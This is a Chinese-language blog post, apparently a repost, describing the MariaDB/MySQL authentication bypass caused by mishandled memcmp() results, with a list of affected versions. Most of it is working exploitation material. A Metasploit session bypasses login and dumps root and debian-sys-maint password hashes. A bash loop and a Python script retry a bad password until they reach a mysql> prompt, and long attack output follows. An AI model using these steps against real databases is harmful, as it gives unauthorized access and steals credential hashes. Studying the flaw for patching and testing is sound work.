当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。
受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
网上已经出了metasploit版本的相应利用工具,下载地址
利用方法如下:
$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
测试方法2:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
测试方法3:
#!/usr/bin/python
import subprocess
while 1:
subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()
如下:
relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
mysql>
原文地址
|